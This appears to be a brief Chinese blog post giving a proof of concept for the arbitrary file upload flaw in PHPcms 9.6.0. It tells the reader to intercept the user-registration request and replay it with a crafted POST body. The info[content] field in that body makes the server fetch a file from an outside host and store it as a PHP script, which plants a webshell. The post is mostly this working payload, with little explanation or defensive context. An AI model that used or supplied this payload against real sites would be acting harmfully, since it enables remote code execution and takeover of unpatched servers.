最新PHPcms9.6.0 任意文件上传漏洞

在用户注册处抓包：

然后发送到repeater

POC:

siteid=1&modelid=11&username=z1aaaac121&password=aasaewee311as&email=a1ea2144@qq.com&info[content]=<img src=http://www.tzjrst.com/templets/1.txt?.php#.jpg>&dosubmit=1&protocol=

posted @ 2017-04-10 19:22 珍惜少年时阅读(1859) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

可我浪费着我寒冷的年华

可我浪费着我寒冷的年华

最新PHPcms9.6.0 任意文件上传漏洞

公告